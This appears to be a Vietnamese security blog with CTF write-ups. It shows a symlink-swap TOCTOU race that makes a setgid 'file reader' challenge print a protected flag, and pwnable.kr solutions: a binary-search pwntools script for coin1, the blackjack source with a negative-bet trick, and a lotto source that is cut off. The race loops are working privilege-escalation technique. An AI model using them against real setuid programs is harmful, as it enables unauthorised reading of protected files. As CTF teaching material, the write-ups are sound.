vuk3r

incognito - Pwn - The Asymptote

2026-04-15T03:29:33.000Z

Description

The Asymptote

A mathematical proof guarantees that an object can never truly reach its destination, as it must always traverse half the remaining distance. Our file reader operates on similar absolute logic. It is demonstrably secure.

Flag Format: IIITL{...}

nc 34.131.216.230 1338

Analyze

Challenge chỉ cho ta link nc nên ta nc vào check thử xem có gì trong này :

└─$ nc 34.131.216.230 1338
bash: cannot set terminal process group (1397804): Inappropriate ioctl for device
bash: no job control in this shell
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ ls -lha
ls -lha
total 28K
drwx------  2 ctf  ctf        4.0K Apr 15 02:43 .
drwx--x--x  1 root root       4.0K Apr 15 02:43 ..
-r-xr-s--x 41 root flag_group 8.5K Apr 14 06:38 challenge
-r--r-----  2 root flag_group   57 Apr 15 02:43 flag.txt
-r--r--r-- 36 root flag_group   96 Mar 23 10:44 welcome.txt
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ cat welcome.txt
cat welcome.txt
Welcome, 8r@v3_H@ck3r.

If you're reading this, you've already done more work than most people.
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ ./challenge
./challenge
Welcome, 8r@v3_H@ck3r.

If you're reading this, you've already done more work than most people.
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$

Ta nhận được 3 file : 1 file nhị phân tên challenge, 1 flag.txt và 1 welcome.txt, chạy file binary thì nó in ra nội dung file welcome.txt .

Với file challenge mình thấy nó được chạy ở quyền group flag_group với mọi user (-r-xr-s--x) và file flag cũng được đọc với quyền root và flag_group , trong khi mình là quyền với user ctf

1
2
3

ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ id
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)

nên bài này mình nghi nó là bài leo quyền để đọc được file flag.

Nếu thế thì chỉ cần tạo symlink tới file flag là mình sẽ đọc được với quyền flag_group nhưng không đơn giản như vậy.

mình sẽ thử xóa file welcome.txt rồi tạo symlink từ file flag.txt đặt tên là welcome.txt để đánh lừa file binary, chạy lại để xem output là gì thì nhận được kết quả là như này :

ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$rm welcome.txt
rm welcome.txt
rm: remove write-protected regular file 'welcome.txt'? y
y
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ ln -s flag.txt welcome.txt
ln -s flag.txt welcome.txt
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ ls -lha
ls -lha
total 24K
drwx------  2 ctf  ctf        4.0K Apr 15 03:00 .
drwx--x--x  1 root root       4.0K Apr 15 03:00 ..
-r-xr-s--x 41 root flag_group 8.5K Apr 14 06:38 challenge
-r--r-----  2 root flag_group   57 Apr 15 03:00 flag.txt
lrwxrwxrwx  1 ctf  ctf           8 Apr 15 03:00 welcome.txt -> flag.txt
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$ ./challenge
./challenge
Security Alert: You don't have permission to read welcome.txt
ctf@bfb9f7dbedb4:~/sessions/player_iRRbZE$

Kết quả như này đồng nghĩa với việc nó kiểm tra real UID trước rồi mới đọc file, nếu ta không có quyền đọc file flag.txt thì sẽ không chơi trò này được.

Nhưng nếu như nó kiểm tra trước rồi mới mở và đọc file, nó dẫn tới khả năng bị race condition với khái niệm TOCTOU – Time Of Check To Time Of Use

Ở đây mình dự đoán code là thay vì gọi hàm open() trực tiếp, nó gọi hàm access() trước rồi mới tới open()

Flow mình giả sử nó là như này :

if (access("welcome.txt", R_OK)
|
fopen("welcome.txt", "r");
|
fgets(BUFF,1000,FILE);
printf("%s",s);

Trước khi đi tới test mình cần check xem có thể thực thi 2 lệnh cùng lúc như nào, thì ở đây mình thấy rằng mỗi khi kết nối tới hệ thống thì nó mở ra 1 thư mục tên là session_abc, vậy có khả năng nếu biết tên thư mục khác thì mình có thể vào được. Mình mở 2 terminal đồng thời nc tới hệ thống thì thấy có vẻ ok

vậy thì idea là mở 2 shell, 1 bên gọi tới để thực thi file binary liên tục, 1 bên sẽ tìm cách hoán đổi file welcome.txt

Solution

Flow mình đánh lừa hệ thống đó là :

xóa file welcome.txt hiện tại
tạo file welcome.txt của riêng mình để mình có quyền đọc file đó
Tạo symlink cho flag.txt mang tên welcome.txt để ghi đè file cũ

rm welcome.txt;
|
echo abc > welcome.txt;
|
ln -sf flag.txt welcome.txt;

Tạo 2 file vòng lặp, và chạy song song, tổ hợp khi 2 vòng lặp đan xen với nhau có khả năng rất nhỏ rằng flow thực thi file binary sẽ là như này :

rm welcome.txt;
|
echo abc > welcome.txt;
|
if (access("welcome.txt", R_OK)
| -> Lúc này access sẽ thấy ta có quyền đọc file welcome.txt 
|    (-rw-r--r--  1 ctf  ctf           4 Apr 15 03:19 welcome.txt)
|
ln -sf flag.txt welcome.txt; 
|
fopen("welcome.txt", "r");
| -> Lúc này welcome.txt đã bị đánh tráo thành symlink nên sẽ mở và đọc file symlink    |    welcome.txt
|
fgets(BUFF,1000,FILE);
printf("%s",s);

Payload

terminal 1 sẽ chạy vòng lặp :

1
2
3

while true; do
  ./challenge;
done

terminal 2 sẽ vào thư mục của terminal 1, xóa file welcome.txtvà chạy vòng lặp :

while true; do
  ln -sf flag.txt welcome.txt;
  rm welcome.txt;
  echo abc > welcome.txt;
done

Vừa chạy vừa canh sẽ thấy thành quả :>

ecurity Alert: You don't have permission to read welcome.txt
Security Alert: You don't have permission to read welcome.txt
abc
Security Alert: You don't have permission to read welcome.txt
abc
Security Alert: You don't have permission to read welcome.txt
abc
Security Alert: You don't have permission to read welcome.txt
Security Alert: You don't have permission to read welcome.txt
IIITL{4cc355_ch3ck_p4553d_bu7_f1l3_5w4pp3d_4876a4790335}
Security Alert: You don't have permission to read welcome.txt
abc
Security Alert: You don't have permission to read welcome.txt
abc

PWNABLE.KR - Phần 2

2026-02-26T14:38:06.000Z

Đây là phần 2 của series Pwnable.kr của mình. Phần này sẽ là các challenge còn lại của Toddler’s Bottle. No need milk anymore, baby grow up !

coin1

Description

1
2
3

Mommy, I wanna play a game!

ssh coin1@pwnable.kr -p2222 (pw: guest)

Source

readme

1	nc 0 9007 to get flag!

Solution

nc tới địa chỉ thì ta sẽ bắt đầu được game. Luật game cơ bản là tìm đúng đồng xu trong N đồng xu, và người chơi có C dự đoán và thêm 1 lần nữa để nhập đáp án. Với mỗi lần tìm được thì tính là 1 xu, và ta cần tìm được 100 đồng tương đương với chơi 100 lần như thế. Với mỗi vòng chỉ được 60s. Với mỗi lần hỏi thì sẽ trả về giá trị của tổng các đồng xu đó, với xu đúng thì là 9 và 10 với các xu còn lại.

Theo mình để ý thì C nó sẽ tầm từ 6 tới 10 lần, tỉ lệ thuận với N. Thì nó chỉ là 1 game đoán số thôi, giả sử mình bảo ai đó nghĩ tới 1 số trong khoảng 0 tới 100, và mình sẽ đoán bằng cách hỏi rằng số đó có lớn hơn 50 không, rồi lớn hơn 75 không, rồi cứ lần lượt như thế thì mình sẽ tìm được số người kia đang nghĩ. Trong giải thuật thì đây là một cách tìm tương tự như Cây Nhị Phân.

Vì chương trình cho ta nhập vào nhiều số nên nếu ta nhập được toàn bộ số của khoảng ta muốn hỏi thì chương trình trả về được rằng trong khoảng đó có số cần tìm hay không.

ví dụ N=10 và số cần tìm là 5

nhập : 1 2 3 4 5 ⇒ chương trình trả về 49 vì đồng 1, 2, 3, 4 là là đồng bình thường nên nó sẽ là 10, còn đồng 5 là đồng cần tìm nên nó là 9 ⇒ tổng là 49

Cái khó ở đây là thời gian limit của mỗi đợt là 60s nên ta cần viết script.

Ta được phép viết script python tại thư mục /tmp và dùng lệnh echo > solve.py

Vậy thì script của ta nó sẽ có :
[+] Một vòng lặp lặp 100 lần tương đương 100 lần chơi.

[+] Một vòng lặp Lặp C+1 lần để chơi cho hết lượt đoán và 1 lần nhập đáp án.

[+] Một đoạn code gen các chuỗi để nhập vào.

~~Mình lười giải thích script quá nên~~ Script như bên dưới:

Payload

from pwn import *
import sys
import math

p = remote('0', int(9007))

context.log_level = 'DEBUG'
context.arch = 'amd64'

p.recvuntil(b'Ready? starting in 3 sec... -\n')
coin = 0
while(coin<=100): # vòng lặp cho 100 lần chơi
    log.info(f'current coin : {coin}')
    p.recvuntil(b'N=')
    N = int(p.recvuntil(b' ',drop=True).decode())
    p.recvuntil(b'C=')
    C = int(p.recvline().decode())
    start  = 0
    end = N # lần đầu tiên LUÔN lấy từ khoảng 0 tới khoảng N/2
    mid = start + math.ceil((start+end)/2)
    while(C>=0): 
        no_sus=0 # tính toán input nhập vào, ví dụ nhập 3 số thì nếu như không có đồng sus sẽ là : no_sus*10
        payload = ''
        mid = math.ceil((start+end)/2)
        for i in range(int(start),int(mid)): 
            no_sus=no_sus+1
            payload += f'{i} '
        p.sendline(payload)
        check = (p.recvline()).decode()
        if('Correct' in check):
            coin = coin + 1
            break
        check = int(check)
        
        no_sus = no_sus * 10
        log.info(f'check: {check} | no_sus: {no_sus}')
        log.info(f'start : {start}')
        log.info(f'end : {end}')
        if(check == no_sus): # nếu như đầu ra giống số dự tính thì đồng sus ở khoảng còn lại
            start = mid
        else:
            end = mid
        C = C-1

p.interactive()

blackjack

Description

Hey! check out this C implementation of blackjack game!
I found it online
* http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html

I like to give my flags to millionares.
how much money you got?

ssh blackjack@pwnable.kr -p2222 (pw:guest)

Source

//// Programmer: Vladislav Shulman
// Final Project
// Blackjack
 
// Feel free to use any and all parts of this program and claim it as your own work
 
//FINAL DRAFT
 
#include 
#include 
#include 
#include 
#include                 //Used for srand((unsigned) time(NULL)) command
 
#define spade 'S'                 //Used to print spade symbol
#define club 'C'                  //Used to print club symbol
#define diamond 'D'               //Used to print diamond symbol
#define heart 'H'                 //Used to print heart symbol
#define RESULTS "Blackjack.txt"  //File name is Blackjack
 
//Global Variables
int k;
int l;
int d;
int won;
int loss;
int cash = 500;
int bet;
int random_card;
int player_total=0;
int dealer_total;
 
//Function Prototypes
int clubcard();      //Displays Club Card Image
int diamondcard();   //Displays Diamond Card Image
int heartcard();     //Displays Heart Card Image
int spadecard();     //Displays Spade Card Image
int randcard();      //Generates random card
int betting();       //Asks user amount to bet
void asktitle();     //Asks user to continue
void rules();        //Prints "Rules of Vlad's Blackjack" menu
void play();         //Plays game
void dealer();       //Function to play for dealer AI
void stay();         //Function for when user selects 'Stay'
void cash_test();    //Test for if user has cash remaining in purse
void askover();      //Asks if user wants to continue playing
void fileresults();  //Prints results into Blackjack.txt file in program directory
 
//Main Function
int main(void)
{
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    int choice1;
    printf("\n");
    printf("\n");
    printf("\n");
    printf("\n              222                111                            ");
    printf("\n            222 222            11111                              ");
    printf("\n           222   222          11 111                            "); 
    printf("\n                222              111                               "); 
    printf("\n               222               111                           ");   
    printf("\n");
    printf("\n%c%c%c%c%c     %c%c            %c%c         %c%c%c%c%c    %c    %c                ", club, club, club, club, club, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);  
    printf("\n%c    %c    %c%c           %c  %c       %c     %c   %c   %c              ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);            
    printf("\n%c    %c    %c%c          %c    %c     %c          %c  %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                        
    printf("\n%c%c%c%c%c     %c%c          %c %c%c %c     %c          %c %c              ", club, club, club, club, club, spade, spade, diamond, diamond, diamond, diamond, heart, club, club);      
    printf("\n%c    %c    %c%c         %c %c%c%c%c %c    %c          %c%c %c             ", club, club, spade, spade, diamond, diamond, diamond, diamond, diamond, diamond, heart, club, club, club);                       
    printf("\n%c     %c   %c%c         %c      %c    %c          %c   %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                                         
    printf("\n%c     %c   %c%c        %c        %c    %c     %c   %c    %c             ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);                                                            
    printf("\n%c%c%c%c%c%c    %c%c%c%c%c%c%c   %c        %c     %c%c%c%c%c    %c     %c            ", club, club, club, club, club, club, spade, spade, spade, spade, spade, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);                                                                                     
    printf("\n");     
    printf("\n                        21                                   ");
     
    printf("\n     %c%c%c%c%c%c%c%c      %c%c         %c%c%c%c%c    %c    %c                ", diamond, diamond, diamond, diamond, diamond, diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                     
    printf("\n        %c%c        %c  %c       %c     %c   %c   %c              ", diamond, diamond, heart, heart, club, club, spade, spade);                                      
    printf("\n        %c%c       %c    %c     %c          %c  %c               ", diamond, diamond, heart, heart, club, spade, spade);                                           
    printf("\n        %c%c       %c %c%c %c     %c          %c %c              ", diamond, diamond, heart, heart, heart, heart, club, spade, spade);                                     
    printf("\n        %c%c      %c %c%c%c%c %c    %c          %c%c %c             ", diamond, diamond, heart, heart, heart, heart, heart, heart, club, spade, spade, spade);                                                
    printf("\n        %c%c      %c      %c    %c          %c   %c               ", diamond, diamond, heart, heart, club, spade, spade);                                                                               
    printf("\n     %c  %c%c     %c        %c    %c     %c   %c    %c             ", diamond, diamond, diamond, heart, heart, club, spade, spade);                                                                                                               
    printf("\n      %c%c%c      %c        %c     %c%c%c%c%c    %c     %c            ", diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                                                                                                                                        
    printf("\n");  
    printf("\n         222                     111                         ");
    printf("\n        222                      111                         ");
    printf("\n       222                       111                         ");
    printf("\n      222222222222222      111111111111111                       ");
    printf("\n      2222222222222222    11111111111111111                         ");
    printf("\n");
    printf("\n");
     
    asktitle();
     
    printf("\n");
    printf("\n");
    return(0);
} //end program
 
void asktitle() // Function for asking player if they want to continue
{
    char choice1;
    int choice2;
     
     printf("\n                 Are You Ready?");
     printf("\n                ----------------");
     printf("\n                      (Y/N)\n                        ");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
    printf("\033[2J\033[1;1H");
            printf("\nEnter 1 to Begin the Greatest Game Ever Played.");
            printf("\nEnter 2 to See a Complete Listing of Rules.");
            printf("\nEnter 3 to Exit Game. (Not Recommended)");
            printf("\nChoice: ");
            scanf("%d", &choice2); // Prompts user for choice
            if((choice2<1) || (choice2>3)) // If invalid choice entered
            {
                printf("\nIncorrect Choice. Please enter 1, 2 or 3\n");
                scanf("%d", &choice2);
            }
            switch(choice2) // Switch case for different choices
            {   
                case 1: // Case to begin game
                   printf("\033[2J\033[1;1H");                    
                   play();                                       
                   break;
                    
                case 2: // Case to see rules
                   printf("\033[2J\033[1;1H");
                   rules();
                   break;
                    
                case 3: // Case to exit game
                   printf("\nYour day could have been perfect.");
                   printf("\nHave an almost perfect day!\n\n");                   
                   exit(0);
                   break;
                    
                default:
                   printf("\nInvalid Input");
            } // End switch case
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        printf("\nYour day could have been perfect.");
        printf("\nHave an almost perfect day!\n\n");
        printf("\033[2J\033[1;1H");
        exit(0);
    }
     
    return;
} // End function
 
void rules() //Prints "Rules of Vlad's Blackjack" list
{
     char choice1;
     int choice2;
      
     printf("\n           RULES of VLAD's BLACKJACK");
     printf("\n          ---------------------------");
     printf("\nI.");
     printf("\n     Thou shalt not question the odds of this game.");
     printf("\n      %c This program generates cards at random.", spade);
     printf("\n      %c If you keep losing, you are very unlucky!\n", diamond);
      
     printf("\nII.");
     printf("\n     Each card has a value.");
     printf("\n      %c Number cards 1 to 10 hold a value of their number.", spade);
     printf("\n      %c J, Q, and K cards hold a value of 10.", diamond);
     printf("\n      %c Ace cards hold a value of 11", club);
     printf("\n     The goal of this game is to reach a card value total of 21.\n");
      
     printf("\nIII.");
     printf("\n     After the dealing of the first two cards, YOU must decide whether to HIT or STAY.");
     printf("\n      %c Staying will keep you safe, hitting will add a card.", spade);
     printf("\n     Because you are competing against the dealer, you must beat his hand.");
     printf("\n     BUT BEWARE!.");
     printf("\n      %c If your total goes over 21, you will LOSE!.", diamond);
     printf("\n     But the world is not over, because you can always play again.\n");
     printf("\n%c%c%c YOUR RESULTS ARE RECORDED AND FOUND IN SAME FOLDER AS PROGRAM %c%c%c\n", spade, heart, club, club, heart, spade);
     printf("\nWould you like to go the previous screen? (I will not take NO for an answer)");
     printf("\n                  (Y/N)\n                    ");

     scanf("\n%c",&choice1);
      
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
            printf("\033[2J\033[1;1H");
            asktitle();
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, convinces user to enter yes
    {
        printf("\033[2J\033[1;1H");
        printf("\n                 I told you so.\n");
        asktitle();
    }
     
    return;
} // End function
 
int clubcard() //Displays Club Card Image
{  
   
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  J  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  A  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
 
             k=1;
         }
    }
     
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  Q  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  K  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;           
}// End function
 
int diamondcard() //Displays Diamond Card Image
{
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  J  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  A  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  Q  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  K  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
}// End function
 
int heartcard() //Displays Heart Card Image
{
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart); 
    printf("|  %d  |\n", k);
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  J  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  A  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  Q  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  K  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int spadecard() //Displays Spade Card Image
{
     
    srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  J  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  A  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  Q  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  K  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int randcard() //Generates random card
{
                
     srand((unsigned) time(NULL)); //Generates random seed for rand() function
     random_card = rand()%4+1;
      
     if(random_card==1)
     {   
         clubcard();
         l=k;
     }
      
     if(random_card==2)
     {
         diamondcard();
         l=k;
     }
      
     if(random_card==3)
     {
         heartcard();
         l=k;
     }
          
     if(random_card==4)
     {
         spadecard();
         l=k;
     }    
     return l;
} // End Function   

 
void play() //Plays game
{
      
     int p=0; // holds value of player_total
     int i=1; // counter for asking user to hold or stay (aka game turns)
     char choice3;
      
     cash = cash;
     cash_test();
     printf("\nCash: $%d\n",cash); //Prints amount of cash user has
     randcard(); //Generates random card
     player_total = p + l; //Computes player total
     p = player_total;
     printf("\nYour Total is %d\n", p); //Prints player total
     dealer(); //Computes and prints dealer total
     betting(); //Prompts user to enter bet amount
        
     while(i<=21) //While loop used to keep asking user to hit or stay at most twenty-one times
                  //  because there is a chance user can generate twenty-one consecutive 1's
     {
         if(p==21) //If user total is 21, win
         {
             printf("\nUnbelievable! You Win!\n");
             won = won+1;
             cash = cash+bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p>21) //If player total is over 21, loss
         {
             printf("\nWoah Buddy, You Went WAY over.\n");
             loss = loss+1;
             cash = cash - bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p<=21) //If player total is less than 21, ask to hit or stay
         {         
             printf("\n\nWould You Like to Hit or Stay?");
              
             scanf("%c", &choice3);
             while((choice3!='H') && (choice3!='h') && (choice3!='S') && (choice3!='s')) // If invalid choice entered
             {                                                                           
                 printf("\n");
                 printf("Please Enter H to Hit or S to Stay.\n");
                 scanf("%c",&choice3);
             }
 
             if((choice3=='H') || (choice3=='h')) // If Hit, continues
             { 
                 randcard();
                 player_total = p + l;
                 p = player_total;
                 printf("\nYour Total is %d\n", p);
                 dealer();
                  if(dealer_total==21) //Is dealer total is 21, loss
                  {
                      printf("\nDealer Has the Better Hand. You Lose.\n");
                      loss = loss+1;
                      cash = cash - bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  } 
      
                  if(dealer_total>21) //If dealer total is over 21, win
                  {                      
                      printf("\nDealer Has Went Over!. You Win!\n");
                      won = won+1;
                      cash = cash+bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  }
             }
             if((choice3=='S') || (choice3=='s')) // If Stay, does not continue
             {
                printf("\nYou Have Chosen to Stay at %d. Wise Decision!\n", player_total);
                stay();
             }
          }
             i++; //While player total and dealer total are less than 21, re-do while loop 
     } // End While Loop
} // End Function
 
void dealer() //Function to play for dealer AI
{
     int z;
      
     if(dealer_total<17)
     {
      srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
      z=rand()%13+1;
      if(z<=10) //If random number generated is 10 or less, keep that value
      {
         d=z;
          
      }
      
      if(z>11) //If random number generated is more than 11, change value to 10
      {
         d=10;
      }
      
      if(z==11) //If random number is 11(Ace), change value to 11 or 1 depending on dealer total
      {
         if(dealer_total<=10)
         {
             d=11;
         }
          
         else
         {
             d=1;
         }
      }
     dealer_total = dealer_total + d;
     }
           
     printf("\nThe Dealer Has a Total of %d", dealer_total); //Prints dealer total
      
} // End Function 
 
void stay() //Function for when user selects 'Stay'
{
     dealer(); //If stay selected, dealer continues going
     if(dealer_total>=17)
     {
      if(player_total>=dealer_total) //If player's total is more than dealer's total, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
      if(player_total//If player's total is less than dealer's total, loss
      {
         printf("\nDealer Has the Better Hand. You Lose.\n");
         loss = loss+1;
         cash = cash - bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
      if(dealer_total>21) //If dealer's total is more than 21, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
     }
     else
     {
         stay();
     }
      
} // End Function
 
void cash_test() //Test for if user has cash remaining in purse
{
     if (cash <= 0) //Once user has zero remaining cash, game ends and prompts user to play again
     {
        printf("You Are Bankrupt. Game Over");
        cash = 500;
        askover();
     }
     if (cash > 1000000){
     FILE* fp=fopen("flag", "r");
char buf[100];
memset(buf, 0, 100);
fread(buf, 1, 100, fp);
printf("%s\n", buf);
fclose(fp);
     }
} // End Function
 
int betting() //Asks user amount to bet
{
 printf("\n\nEnter Bet: $");
 scanf("%d", &bet);
 
 if (bet > cash) //If player tries to bet more money than player has
 {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
 }
 else return bet;
} // End Function
 
void askover() // Function for asking player if they want to play again
{
    char choice1;
         
     printf("\nWould You Like To Play Again?");
     printf("\nPlease Enter Y for Yes or N for No\n");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue.
    { 
            printf("\033[2J\033[1;1H");
            play();
    }
  
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        fileresults();
        printf("\nBYE!!!!\n\n");
        printf("\033[2J\033[1;1H");
        exit(0);
    }
    return;
} // End function
 
void fileresults() //Prints results into Blackjack.txt file in program directory
{
     return;
} // End Function

Solution

Bài này mình giải hơn mất não, chỉ cần biết là nó sẽ luôn thua nên tiền cược mình nhồi số âm vào và nó vô tình dính lỗi integer overflow nên tiền nó tăng lên. Thế là lấy được flag.

lotto

Description

Mommy! I made a lotto program for my homework.
do you want to play?

ssh lotto@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 
#include 
#include 

unsigned char submit[6];

void play(){

int i;
printf("Submit your 6 lotto bytes : ");
fflush(stdout);

int r;
r = read(0, submit, 6);

printf("Lotto Start!\n");
//sleep(1);

// generate lotto numbers
int fd = open("/dev/urandom", O_RDONLY);
if(fd==-1){
printf("error. tell admin\n");
exit(-1);
}
unsigned char lotto[6];
if(read(fd, lotto, 6) != 6){
printf("error2. tell admin\n");
exit(-1);
}
for(i=0; i<6; i++){
lotto[i] = (lotto[i] % 45) + 1;// 1 ~ 45
}
close(fd);

// calculate lotto score
int match = 0, j = 0;
